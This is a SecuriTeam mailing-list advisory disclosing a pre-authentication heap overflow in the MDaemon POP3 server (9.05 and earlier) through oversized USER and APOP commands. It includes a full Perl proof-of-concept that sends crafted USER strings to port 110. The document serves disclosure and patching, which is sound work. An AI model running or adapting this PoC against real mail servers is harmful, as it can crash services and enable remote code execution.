The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
MDaemon POP3 Server Buffer Overflow (preauth)
------------------------------------------------------------------------
SUMMARY
<http://www.altn.com/> MDaemon Server is "a standards-based SMTP/POP/IMAP
mail server that offers a full range of mail server functionality. MDaemon
is designed to manage the email needs of any number of individual users
and comes complete with a powerful set of integrated tools for managing
mail accounts and message formats. MDaemon offers a scalable SMTP, POP3,
and IMAP4 mail server complete with LDAP support, an integrated
browser-based email client, content filtering, spam filters, extensive
security features, and more". A pre-authentication vulnerability in
MDaemon allows remote attackers to cause the product to overflow an
internal buffer and potentially execute arbitrary code.
DETAILS
Vulnerable Systems:
* MDaemon version 9.05 and prior
Immune Systems:
* MDaemon version 9.06
During an audit, a critical vulnerability has been discovered in the
MDaemon POP3 server. There is a buffer overflow vulnerability in 'USER'
and 'APOP' command processing part of the Altn MDaemon POP3 server. The
vulnerability can be triggered with providing a long string to USER or
APOP commands with '@' characters included in the string. In this case,
MDaemon will incorrectly process the string and a heap overflow will
happen as a result. To trigger the vulnerability, a few USER commands have
to be sent to the POP3 Server. Sometimes (depending on the heap state and
string length), it is even possible to redirect code execution directly to
the supplied input buffer on the heap.
Exploit:
#
# PoC for Mdaemon POP3 preauth heap overflow
#
# Coded by Leon Juranic <leon.juranic@infigo.hr>
# Infigo IS <http://www.infigo.hr>
#
#
$host = '192.168.0.105';
use IO::Socket;
for ($x = 0 ; $x < 12 ; $x++)
{
$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto
=> 'tcp')
|| die "socket error\n\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "USER " . "\@A" x 160 . "\r\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "QUIT\r\n";
recv ($sock, $var, 10000,0);
print $var;
close ($sock);
sleep(1);
}
$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto
=> 'tcp')
|| die "socket error\n\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "USER " . "\@A\@A" . "B" x 326 . "\r\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "USER " . "\'A" x 337 . "\r\n";
recv ($sock, $var, 10000,0);
print $var;
sleep(2);
ADDITIONAL INFORMATION
The information has been provided by <mailto:sasa.jusic@infigo.hr> Sasa
Jusic and <mailto:leon.juranic@infigo.hr> Leon Juranic.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
